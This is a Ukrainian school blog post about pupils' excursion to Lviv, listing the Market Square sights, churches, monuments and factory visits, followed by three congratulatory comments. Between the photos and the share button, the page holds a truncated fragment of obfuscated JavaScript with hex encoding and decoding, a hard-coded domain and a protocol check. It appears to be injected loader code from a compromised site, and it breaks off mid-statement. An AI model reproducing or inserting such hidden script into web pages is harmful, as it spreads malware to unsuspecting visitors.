Знайомство зі Львовом

image (19)

 

Учні Корнинської школи відвідали старовине місто Львів. Екскурсію розпочали на площі Ринок, де кожен дім має власну історію. Тут побачили будинки, що дійшли до нас в незмінному вигляді ще з часів ренесансу: чорну кам’яницю, палац Корнякта,  палац Любомирських, відвідали відомий у Львові “Італійський дворик ” .  Ми переконуємось в тому, що Львів –  це  місто храмів.  Єзуїтський храм і Латинський катедральний собор, Бернардинський монастир і Вірменська церква,  ансамбль церкви Успення і Домініканський костел – все дихає історією і старовиною. Під час прогулянки відвідали  памятник Т.Шевченка та І.Підкови. Цікавою була екскурсія до фабрики шоколаду та фабрики кави.

gHecR05zzOk

image (12)

image (16)

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "klasnashkola.eu"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Share Button

5s коментарів

  1. Анастасія Власюк

    Ви виглядаєте дуже радісними та щасливими.
    Бажаю вам таких самих щирих посмішок на протязі подальшого навчання та життя.
    Вам дуже пощастило побувати у мальовничому місті Львові. Нехай ця подорож буде лише початком пізнання всієї краси нашої держави.

    Відповіcти
  2. Сніжана Могиль

    Які молодці! Львів – прекрасне місто, яке повинні відвідати всі. Ми теж плануємо зробити таку цікаву подорож у майбутньому, мріємо відвідати висвітлені вами місця.

    Відповіcти
  3. Богдана Сніцар

    Як же гарно! Це дуже пізнавально. Думаю всі хотіли б познайомитися зі Львовом! Молодчинки. Успіхів вам у майбутньому.

    Відповіcти

Напишіть відгук

Ваша пошт@ не публікуватиметься. Обов’язкові поля позначені *

Можна використовувати XHTML теґи та атрибути: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>